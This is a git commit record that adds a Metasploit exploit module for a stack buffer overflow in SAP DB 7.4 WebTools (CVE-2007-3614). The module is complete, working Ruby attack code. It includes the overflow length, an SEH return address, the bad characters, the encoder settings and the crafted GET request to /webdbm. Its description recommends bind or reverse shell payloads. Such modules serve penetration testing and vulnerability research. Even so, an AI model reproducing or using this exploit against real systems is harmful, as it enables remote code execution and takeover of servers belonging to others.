added exploit module sapdb_webtools.rb

git-svn-id: file:///home/svn/framework3/trunk@5045 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Mario Ceballos 2007-07-11 21:16:30 +00:00
parent f3dd74cfc9
commit 2b4a3d88e3
1 changed files with 83 additions and 0 deletions

View File

@ -0,0 +1,83 @@
##
# $Id: sapdb_webtools.rb 4498 2007-03-01 08:21:36Z mmiller $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
module Msf
class Exploits::Windows::Http::SapDB_Webtools < Msf::Exploit::Remote
include Exploit::Remote::HttpClient
include Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'SAP DB 7.4 WebTools Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in SAP DB 7.4 WebTools.
By sending an overly long GET request, it may be possible for
an attacker to execute arbitrary code. Using the PAYLOAD of
windows/shell_bind_tcp or windows/shell_reverse_tcp allows
for the most reliable results.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 4498 $',
'References' =>
[
[ 'BID', '24773' ],
[ 'CVE', '2007-3614' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 850,
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
},
'Platform' => 'win',
'Targets' =>
[
[ 'SAP DB 7.4 WebTools', { 'Ret' => 0x1003c95a } ], # wapi.dll 7.4.3.0
],
'DisclosureDate' => 'July 5 2007',
'DefaultTarget' => 0))
register_options( [ Opt::RPORT(9999) ], self.class )
end
def exploit
c = connect
filler = rand_text_alphanumeric(20774)
seh = generate_seh_payload(target.ret)
# pretty big...
sploit = filler + seh + rand_text_alphanumeric(3000)
print_status("Trying to exploit target #{target.name} 0x%.8x" % target.ret)
res = send_request_raw({
'uri' => '/webdbm',
'query' => 'Event=DBM_INTERN_TEST&Action=REFRESH&HTTP_COOKIE=' + sploit
}, 5)
handler
end
end
end